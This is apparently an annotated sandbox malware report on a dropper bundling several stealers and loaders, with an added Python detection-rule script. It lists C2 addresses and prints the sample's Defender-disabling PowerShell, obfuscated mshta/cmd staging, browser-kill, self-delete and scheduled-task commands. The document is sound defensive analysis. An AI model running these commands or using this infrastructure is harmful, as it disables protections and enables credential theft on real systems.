Analysis

max time kernel:   14s
max time network:  150s
platform:          windows10_x64
resource:          win10-en-20211014
submitted:         19/11/2021, 18:12

Static task:      static1
Behavioral task:  behavioral1
  Sample:    ab0bd8932a92421272b5911e2ebf488b.exe
  Resource:  win7-en-20211104

Note: the YARA hits and memory dumps listed under Signatures carry the prefix behavioral2, a second behavioral task that this extract does not list.

General

Target:  ab0bd8932a92421272b5911e2ebf488b.exe
Size:    9.7MB
MD5:     ab0bd8932a92421272b5911e2ebf488b
SHA1:    8fc75411fae94208b303c30faf3f4ba7385f8e22
SHA256:  61299f208e35ed6fa26b16639ff495d378f64f9486a70c29eae80592d930e791
SHA512:  587d69b5016732170311cbfd85ca04c5b8127158e839e0155a6c225f3dd4e9a9f8a38b758316d557ceaf1b7c676c86f46250a5d3fd34c33681003cc41f1ddbc9
Malware Config

Five distinct families were extracted from one run of this 9.7MB installer: the sample is a bundle that drops several payloads rather than a single family.

Extracted: socelars
  C2: http://www.gianninidesign.com/

Extracted: amadey
  Version: 2.82
  C2: 185.215.113.45/g4MbvE/index.php

Extracted: vidar
  Version: 48.3
  Botnet: 933
  profile_id: 933

Extracted: smokeloader
  Version: 2020
  C2: http://membro.at/upload/
      http://jeevanpunetha.com/upload/
      http://misipu.cn/upload/
      http://zavodooo.ru/upload/
      http://targiko.ru/upload/
      http://vues3d.com/upload/

Extracted: redline
  Botnet: media151
  C2: 91.121.67.60:51630
Signatures

Process spawned unexpected child process (2 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro. For wmiprvse.exe specifically, a child such as rundll32.exe is also what process creation through WMI (Win32_Process.Create) looks like, so read the hit as "executed via WMI or through a compromised WMI host" and pivot on the two rundll32.exe PIDs; neither appears in the process-tree extract below.
  pid   pid_target  process       procid_target  description
  2992  2220        rundll32.exe  145            Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
  6504  2220        rundll32.exe  145            Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (2 IoCs)
  resource                                                                       yara_rule
  behavioral2/memory/2144-283-0x0000000000418EFA-mapping.dmp                     family_redline
  behavioral2/memory/2144-282-0x0000000000400000-0x0000000000420000-memory.dmp   family_redline
  Both hits are memory dumps of PID 2144 rather than files on disk, so the RedLine payload was unpacked in memory; PID 2144 is not among the processes in the tree extract below.
SmokeLoader
  Modular backdoor trojan in use since 2014.

Socelars Payload (2 IoCs)
  resource                                        yara_rule
  behavioral2/files/0x000400000001abb2-163.dat    family_socelars
  behavioral2/files/0x000400000001abb2-196.dat    family_socelars

Vidar Stealer (2 IoCs)
  resource                                                                       yara_rule
  behavioral2/memory/4636-350-0x0000000000400000-0x00000000004D8000-memory.dmp   family_vidar
  behavioral2/memory/4636-347-0x00000000021D0000-0x00000000022A5000-memory.dmp   family_vidar
  PID 4636 is Worldoffer.exe in the process tree below.

ASPack-packed files (yara rule aspack_v212_v242, 6 IoCs)
  resource                                        yara_rule
  behavioral2/files/0x000400000001aba1-123.dat    aspack_v212_v242
  behavioral2/files/0x000400000001aba1-124.dat    aspack_v212_v242
  behavioral2/files/0x000400000001aba2-122.dat    aspack_v212_v242
  behavioral2/files/0x000400000001aba2-127.dat    aspack_v212_v242
  behavioral2/files/0x000400000001aba4-128.dat    aspack_v212_v242
  behavioral2/files/0x000400000001aba4-131.dat    aspack_v212_v242

Downloads MZ/PE file
Executes dropped EXE (18 IoCs)
  pid   process
  3852  setup_installer.exe
  4092  setup_install.exe
  1464  Mon1348816450.exe
  1376  Mon13459b4085.exe
  1640  Mon13136643d24e51.exe
  1180  Mon13d453d994180b.exe
  1672  Mon133b4073df5e3f72.exe
  1280  Mon135d1cd0566c227c.exe
  2764  Mon13073304e5395.exe
  2800  Mon134ab4d3e88a4d3e.exe
  3952  Mon13a2838ed1d8384.exe
  4416  Mon13be6b39578.exe
  4260  Mon13248c3d7ea8c81.exe
  4736  Mon13bb1ac8986b773.exe
  4996  Mon13470f9aa951f871.exe
  5056  Mon13073304e5395.tmp
  2340  Mon13d453d994180b.tmp
  4756  Mon13470f9aa951f871.exe
  The Mon13* components are the stages unpacked from setup_install.exe. Only PIDs 1464, 1376, 1640, 1180, 1672 and 1280 appear in the process-tree extract below, which is cut off inside the Mon13136643d24e51.exe subtree.

Loads dropped DLL (7 IoCs)
  pid   process
  4092  setup_install.exe (6 entries)
  5056  Mon13073304e5395.tmp
Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
  In this run the second-stage binaries 18.exe and Transmissibility.exe are fetched from cdn.discordapp.com (see the extd.exe "/download" entries in the process tree below).

Looks up external IP address via web service (6 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  310   ipinfo.io
  14    ip-api.com
  43    ipinfo.io
  44    ipinfo.io
  193   ipinfo.io
  309   ipinfo.io

Looks up geolocation information via web service
  Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of SetThreadContext (1 IoCs)
  description                           pid   process                   procid_target
  PID 4996 set thread context of 4756   4996  Mon13470f9aa951f871.exe   95
  Both PIDs run the same image (see Executes dropped EXE), and 4756 is the process that WerFault.exe later reports as crashed: a parent starting a copy of itself and rewriting the child's thread context is the process-hollowing pattern.

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  No ransomware family was identified in this run; read together with the SCSI registry checks below, the behaviour is more consistent with environment fingerprinting.

Program crash (10 IoCs)
  pid   pid_target  process       procid_target
  3496  4756        WerFault.exe  95
  1520  728         WerFault.exe  118
  1128  728         WerFault.exe  118
  5300  728         WerFault.exe  118
  5828  728         WerFault.exe  118
  6080  728         WerFault.exe  118
  5324  2260        WerFault.exe  124
  504   728         WerFault.exe  118
  3756  6124        WerFault.exe  162
  1264  2424        WerFault.exe  117
  pid_target is the crashing process: 4756 (Mon13470f9aa951f871.exe, the SetThreadContext target), 728 (setup.exe, six times), 2260 (chrome3.exe), 6124 (S3BTMsvx1awTSaJavTtOP4zy.exe) and 2424 (chrome update.exe); see the process tree below.
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  description      ioc                                                 process
  Key opened       \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI    Mon134ab4d3e88a4d3e.exe
  Key queried      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI    Mon134ab4d3e88a4d3e.exe
  Key enumerated   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI    Mon134ab4d3e88a4d3e.exe

Creates scheduled task(s) (1 TTPs, 3 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid   process
  3796  schtasks.exe
  4296  schtasks.exe
  5024  schtasks.exe
  PIDs 3796 and 4296 register "PowerControl LG" (ONLOGON) and "PowerControl HR" (HOURLY), both running C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe as Admin with /rl HIGHEST (see the process tree below); 5024 is not in the tree extract.

Kills process with taskkill (6 IoCs)
  pid   process
  1376  taskkill.exe
  5716  taskkill.exe
  6876  taskkill.exe
  7084  taskkill.exe
  6088  taskkill.exe
  2020  taskkill.exe
  In the tree below these fall into two uses: killing chrome.exe before browser data is read (PID 2020), and a launcher killing or deleting its own original image after copying itself under a new name (PIDs 1376, 6876, 7084, 6088). PID 5716 is not in the tree extract.

Suspicious behavior: EnumeratesProcesses (8 IoCs)
  pid   process
  4416  Mon13be6b39578.exe (4 entries)
  2740  powershell.exe
  4696  RunDll32.exe (the process tree below lists PID 4696 as powershell.exe)
  2800  Mon134ab4d3e88a4d3e.exe (2 entries)
Suspicious use of AdjustPrivilegeToken (38 IoCs)
  pid   process                   token privileges requested
  1280  Mon135d1cd0566c227c.exe   SeDebugPrivilege
  3952  Mon13a2838ed1d8384.exe    SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, 31, 32, 33, 34, 35 (34 entries)
  2740  powershell.exe            SeDebugPrivilege
  4696  RunDll32.exe              SeDebugPrivilege
  1376  taskkill.exe              SeDebugPrivilege
  The entries for PID 3952 are the well-known privilege LUIDs 2 through 35 in order (31 to 35 are the ones the sandbox did not resolve to names), i.e. the process tried to enable every privilege in its token rather than one specific right. AdjustTokenPrivileges can only enable privileges the token already holds, so this list records what was requested, not what was granted.
Suspicious use of WriteProcessMemory (64 IoCs)
  pid   wrote to  process                                 procid_target  entries
  4308  3852      ab0bd8932a92421272b5911e2ebf488b.exe    68             3
  3852  4092      setup_installer.exe                     69             3
  4092  4584      setup_install.exe                       72             3
  4092  4572      setup_install.exe                       73             3
  4092  4644      setup_install.exe                       74             3
  4092  3756      setup_install.exe                       78             3
  4572  4696      cmd.exe                                 77             3
  4584  2740      cmd.exe                                 76             3
  4092  4264      setup_install.exe                       75             3
  4092  540       setup_install.exe                       79             3
  4092  764       setup_install.exe                       80             3
  4092  876       setup_install.exe                       81             3
  4092  440       setup_install.exe                       82             3
  4092  884       setup_install.exe                       89             3
  4092  1128      setup_install.exe                       83             3
  4092  1264      setup_install.exe                       84             3
  4092  1496      setup_install.exe                       109            3
  540   1464      cmd.exe                                 88             2
  764   1376      cmd.exe                                 86             3
  4264  1180      cmd.exe                                 87             3
  876   1640      cmd.exe                                 108            3
  3756  1672      cmd.exe                                 90             2
  Every row is a parent writing into a child it has just created (compare the process tree below), which is the normal pattern of process start-up rather than injection into an unrelated process; the SetThreadContext hit above is the one worth chasing.
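The signatures above (the unexpected wmiprvse.exe child, the scheduled tasks created with /rl HIGHEST, the taskkill calls) and the command lines in the process tree that follows (the Set-MpPreference / Add-MpPreference PowerShell, mshta.exe running inline VBScript, msiexec.exe -Y loading a stitched file) reduce to a handful of parent/child and command-line rules. What follows is an added example written for this page, not Triage's detection logic and not code from the sample: a small rule set run over process-creation records constructed from this report's tree. The record fields (pid, ppid, image, parent_image, command_line) are an assumption modelled on Sysmon event ID 1; the rundll32.exe command line and the final explorer.exe/notepad.exe control record are made up, since the report does not show them.

```python
"""Rule-based triage of process-creation events, modelled on this report.

Added example, not part of the Triage report or its tooling. The event fields
are an assumption loosely following Sysmon event ID 1; SAMPLE_EVENTS is
constructed from command lines in the process tree, plus one benign control.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    parent_image: str
    command_line: str


# Parent -> children a healthy host should not see it create. wmiprvse.exe also
# hosts Win32_Process.Create calls, so a hit means "executed via WMI or through
# a compromised WMI host", not "exploited" by itself.
UNEXPECTED_CHILDREN = {
    "wmiprvse.exe": {"rundll32.exe", "cmd.exe", "powershell.exe", "mshta.exe", "regsvr32.exe"},
}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "opera.exe", "brave.exe"}

RULES = [
    # Defender: real-time protection switched off, or an exclusion carved out.
    ("defender-tamper", re.compile(
        r"set-mppreference\b.*-disablerealtimemonitoring\s*\$?true"
        r"|add-mppreference\b.*-exclusion(path|process|extension)\b", re.I)),
    # mshta executing script passed on the command line (no .hta file on disk).
    ("mshta-inline-script", re.compile(r'mshta(\.exe)?"?\s+(vbscript|javascript)\s*:', re.I)),
    # Scheduled task created with the highest run level.
    ("schtasks-highest", re.compile(r"schtasks\b.*\s/create\b.*\s/rl\s+highest\b", re.I)),
    # taskkill chained with del in one cmd line: a launcher removing itself.
    ("self-delete", re.compile(r"taskkill\b.*&.*\bdel\b", re.I)),
    # msiexec -y loads the named file as a DLL and calls its DllRegisterServer.
    ("msiexec-dll-register", re.compile(r'msiexec(\.exe)?"?\s+[-/]y\s+\S+', re.I)),
]
TASKKILL_IM = re.compile(r'taskkill\b.*[-/]im\s+"?([^\s"]+)', re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return (pid, rule, detail) for every rule each event trips."""
    findings = []
    for ev in events:
        img, parent = basename(ev.image), basename(ev.parent_image)
        if img in UNEXPECTED_CHILDREN.get(parent, ()):
            findings.append((ev.pid, "unexpected-child", f"{parent} -> {img}"))
        for name, rx in RULES:
            if rx.search(ev.command_line):
                findings.append((ev.pid, name, ev.command_line[:72]))
        m = TASKKILL_IM.search(ev.command_line)
        if m and m.group(1).lower() in BROWSERS:
            # Killing the browser releases its profile databases for a stealer to copy.
            findings.append((ev.pid, "kills-browser", m.group(1)))
    return findings


CMD = r"C:\Windows\SysWOW64\cmd.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
# Constructed from the report; rundll32's own command line is not shown there.
SAMPLE_EVENTS = [
    ProcEvent(2992, 2220, r"C:\Windows\System32\rundll32.exe",
              r"C:\Windows\system32\wbem\wmiprvse.exe", "rundll32.exe"),
    ProcEvent(2740, 4584, PS, CMD, "powershell -inputformat none -outputformat none -NonInteractive "
              "-Command Set-MpPreference -DisableRealtimeMonitoring $true "
              "-SubmitSamplesConsent NeverSend -MAPSReporting Disable"),
    ProcEvent(4696, 4572, PS, CMD, "powershell -inputformat none -outputformat none -NonInteractive "
              r'-Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"'),
    ProcEvent(6044, 728, r"C:\Windows\SysWOW64\mshta.exe", r"C:\Users\Admin\AppData\Roaming\1112626.exe",
              r'"C:\Windows\System32\mshta.exe" vbscRIpT: cLosE( CREaTeOBJeCT( "wsCrIpt.SheLl" ). run ( '
              r'"cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Roaming\1112626.exe"" ..\IGEVs2AgDHRD.EXe" , 0,trUE ) )'),
    ProcEvent(3796, 5560, r"C:\Windows\SysWOW64\schtasks.exe",
              r"C:\Users\Admin\Pictures\Adobe Films\2pxQh0RIhP1_2eIKt4DiswNe.exe",
              r'schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" '
              r'/tn "PowerControl LG" /sc ONLOGON /rl HIGHEST'),
    ProcEvent(2020, 960, r"C:\Windows\SysWOW64\taskkill.exe", CMD, "taskkill /f /im chrome.exe"),
    ProcEvent(6768, 1296, CMD, r"C:\Users\Admin\Pictures\Adobe Films\AjW2kk0fyqYsAJo9tWM9KfZh.exe",
              r'"C:\Windows\System32\cmd.exe" /c taskkill /im AjW2kk0fyqYsAJo9tWM9KfZh.exe /f & timeout /t 6 '
              r'& del /f /q "C:\Users\Admin\Pictures\Adobe Films\AjW2kk0fyqYsAJo9tWM9KfZh.exe" & del C:\ProgramData\*.dll & exit'),
    ProcEvent(6176, 6632, r"C:\Windows\SysWOW64\msiexec.exe", CMD, r"msiexec.exe -Y ..\VYGDVP.ly"),
    # Benign control: an ordinary explorer.exe -> notepad.exe start trips nothing.
    ProcEvent(1234, 1000, r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for pid, rule, detail in triage(SAMPLE_EVENTS):
        print(f"{pid:>5}  {rule:<20}  {detail}")
```

Run as a script it prints one finding per line; the nine constructed records yield eight findings and the control record none. The Defender rule keys on the cmdlet and parameter names rather than on this sample's exact string, because the same tampering is routinely issued through split or encoded commands. The parent/child check is only as trustworthy as the parent_image field, so in live telemetry confirm that it reflects the actual creating process rather than a spoofed parent PID.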
Processes

Process tree from the behavioral run. Indentation shows parent/child nesting; "cmd:" gives the command line where it differs from the quoted image path; "sig:" lists the signatures the process triggered. The first two children of setup_install.exe (PIDs 4584 and 4572, running PowerShell as 2740 and 4696) disable Defender real-time monitoring, sample submission and MAPS reporting and then exclude the drop directory from scanning, before any payload is launched. This extract of the tree is cut off inside the Mon13136643d24e51.exe subtree.

PID 4308  C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe
    sig: Suspicious use of WriteProcessMemory
  PID 3852  C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      sig: Executes dropped EXE; Suspicious use of WriteProcessMemory
    PID 4092  C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe
        sig: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
      PID 4584  C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          sig: Suspicious use of WriteProcessMemory
        PID 2740  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
            sig: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      PID 4572  C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          sig: Suspicious use of WriteProcessMemory
        PID 4696  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      PID 4644  C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Mon135d1cd0566c227c.exe
        PID 1280  C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon135d1cd0566c227c.exe
            cmd: Mon135d1cd0566c227c.exe
            sig: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
          PID 2680  C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
            PID 4000  C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe
              PID 4604  C:\Users\Admin\AppData\Roaming\3490427.exe
              PID 1936  C:\Users\Admin\AppData\Roaming\4775316.exe
                PID 5196  C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
              PID 2688  C:\Users\Admin\AppData\Roaming\6971572.exe
              PID 3804  C:\Users\Admin\AppData\Roaming\1961519.exe
                PID 728  C:\Users\Admin\AppData\Roaming\1112626.exe
                  PID 6044  C:\Windows\SysWOW64\mshta.exe
                      cmd: "C:\Windows\System32\mshta.exe" vbscRIpT: cLosE( CREaTeOBJeCT( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Roaming\1112626.exe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF """" =="""" for %L In ( ""C:\Users\Admin\AppData\Roaming\1112626.exe"" ) do taskkill -IM ""%~NxL"" -F " , 0,trUE ) )
                    PID 768  C:\Windows\SysWOW64\cmd.exe
                        cmd: "C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Roaming\1112626.exe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "" =="" for %L In ( "C:\Users\Admin\AppData\Roaming\1112626.exe" ) do taskkill -IM "%~NxL" -F
                      PID 6408  C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe
                          cmd: ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM
                        PID 6584  C:\Windows\SysWOW64\mshta.exe
                            cmd: "C:\Windows\System32\mshta.exe" vbscRIpT: cLosE( CREaTeOBJeCT( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF ""/PGeb9DQls~acXsvr9DzE3PVM "" =="""" for %L In ( ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ) do taskkill -IM ""%~NxL"" -F " , 0,trUE ) )
                          PID 6820  C:\Windows\SysWOW64\cmd.exe
                              cmd: "C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "/PGeb9DQls~acXsvr9DzE3PVM " =="" for %L In ( "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ) do taskkill -IM "%~NxL" -F
                        PID 4928  C:\Windows\SysWOW64\mshta.exe
                            cmd: "C:\Windows\System32\mshta.exe" Vbscript:CloSe ( cREATEobjeCT( "WScRipT.SHelL" ). rUN( "cMD.EXE /q /R eCHo | set /p = ""MZ"" > TiSQ.G& coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly &DEl /q *& stArT msiexec.exe -Y ..\VYGDVP.ly ", 0 , tRuE ))
                          PID 6632  C:\Windows\SysWOW64\cmd.exe
                              cmd: "C:\Windows\System32\cmd.exe" /q /R eCHo | set /p = "MZ" > TiSQ.G& coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly&DEl /q *&stArT msiexec.exe -Y ..\VYGDVP.ly
                            PID 1232  C:\Windows\SysWOW64\cmd.exe
                                cmd: C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                            PID 7056  C:\Windows\SysWOW64\cmd.exe
                                cmd: C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>TiSQ.G"
                            PID 6176  C:\Windows\SysWOW64\msiexec.exe
                                cmd: msiexec.exe -Y ..\VYGDVP.ly
                      PID 6876  C:\Windows\SysWOW64\taskkill.exe
                          cmd: taskkill -IM "1112626.exe" -F
                          sig: Kills process with taskkill
                PID 3936  C:\Users\Admin\AppData\Roaming\211320.exe
              PID 4252  C:\Users\Admin\AppData\Roaming\8883359.exe
            PID 4680  C:\Users\Admin\AppData\Local\Temp\inst1.exe
            PID 2424  C:\Users\Admin\AppData\Local\Temp\chrome update.exe
              PID 1264  C:\Windows\system32\WerFault.exe
                  cmd: C:\Windows\system32\WerFault.exe -u -p 2424 -s 1532
                  sig: Program crash
            PID 728  C:\Users\Admin\AppData\Local\Temp\setup.exe
              PID 1520  C:\Windows\SysWOW64\WerFault.exe
                  cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 808
                  sig: Program crash
              PID 1128  C:\Windows\SysWOW64\WerFault.exe
                  cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 840
                  sig: Program crash
              PID 5300  C:\Windows\SysWOW64\WerFault.exe
                  cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 864
                  sig: Program crash
              PID 5828  C:\Windows\SysWOW64\WerFault.exe
                  cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 880
                  sig: Program crash
              PID 6080  C:\Windows\SysWOW64\WerFault.exe
                  cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 964
                  sig: Program crash
              PID 504  C:\Windows\SysWOW64\WerFault.exe
                  cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 888
                  sig: Program crash
            PID 1732  C:\Users\Admin\AppData\Local\Temp\zhangliang-game.exe
            PID 700  C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
              PID 4056  C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                  cmd: C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
            PID 4232  C:\Users\Admin\AppData\Local\Temp\chrome2.exe
              PID 5776  C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                PID 5068  C:\Windows\System32\conhost.exe
                    cmd: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
            PID 2260  C:\Users\Admin\AppData\Local\Temp\chrome3.exe
              PID 5324  C:\Windows\system32\WerFault.exe
                  cmd: C:\Windows\system32\WerFault.exe -u -p 2260 -s 1508
                  sig: Program crash
            PID 980  C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
              PID 1748  C:\Windows\System32\conhost.exe
                  cmd: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
            PID 380  C:\Users\Admin\AppData\Local\Temp\chrome1.exe
            PID 4636  C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe
      PID 4264  C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Mon13d453d994180b.exe
          sig: Suspicious use of WriteProcessMemory
        PID 1180  C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13d453d994180b.exe
            cmd: Mon13d453d994180b.exe
            sig: Executes dropped EXE
          PID 2340  C:\Users\Admin\AppData\Local\Temp\is-1GIM0.tmp\Mon13d453d994180b.tmp
              cmd: "C:\Users\Admin\AppData\Local\Temp\is-1GIM0.tmp\Mon13d453d994180b.tmp" /SL5="$7007A,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13d453d994180b.exe"
              sig: Executes dropped EXE
      PID 3756  C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Mon133b4073df5e3f72.exe
          sig: Suspicious use of WriteProcessMemory
        PID 1672  C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe
            cmd: Mon133b4073df5e3f72.exe
            sig: Executes dropped EXE
          PID 4276  C:\Windows\SysWOW64\mshta.exe
              cmd: "C:\Windows\System32\mshta.exe" VbScriPt: CLOSE ( cReatEObjECT("WscripT.SHell").run ( "C:\Windows\system32\cmd.exe /Q /C tyPe ""C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe"" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF """" =="""" for %Z IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe"") do taskkill /f -im ""%~nXZ"" " , 0, TRUE ) )
            PID 520  C:\Windows\SysWOW64\cmd.exe
                cmd: "C:\Windows\system32\cmd.exe" /Q /C tyPe "C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9&iF "" =="" for %Z IN ( "C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe") do taskkill /f -im "%~nXZ"
              PID 1120  C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe
                  cmd: 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9
                PID 2944  C:\Windows\SysWOW64\mshta.exe
                    cmd: "C:\Windows\System32\mshta.exe" VbScriPt: CLOSE ( cReatEObjECT("WscripT.SHell").run ( "C:\Windows\system32\cmd.exe /Q /C tyPe ""C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe"" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF ""/PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9"" =="""" for %Z IN ( ""C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe"") do taskkill /f -im ""%~nXZ"" " , 0, TRUE ) )
                  PID 4292  C:\Windows\SysWOW64\cmd.exe
                      cmd: "C:\Windows\system32\cmd.exe" /Q /C tyPe "C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9&iF "/PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9" =="" for %Z IN ( "C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe") do taskkill /f -im "%~nXZ"
                PID 5284  C:\Windows\SysWOW64\mshta.exe
                    cmd: "C:\Windows\System32\mshta.exe" vbscript:ClOse( CReatEobJeCt ("wscrIPt.SHElL" ). RuN ( "C:\Windows\system32\cmd.exe /q/r EChO | sEt /P = ""MZ"" >XlaE8u7.Rq & cOPy /B /y XLaE8u7.rQ + UnS0AW.LjZ + M_Ko01.HO + GNPM.EM + VLcSO2Y.Z+ fQRB.5 pcAKEo.F & STart control.exe .\PcAKEO.F " ,0 ,TrUe ) )
              PID 1376  C:\Windows\SysWOW64\taskkill.exe
                  cmd: taskkill /f -im "Mon133b4073df5e3f72.exe"
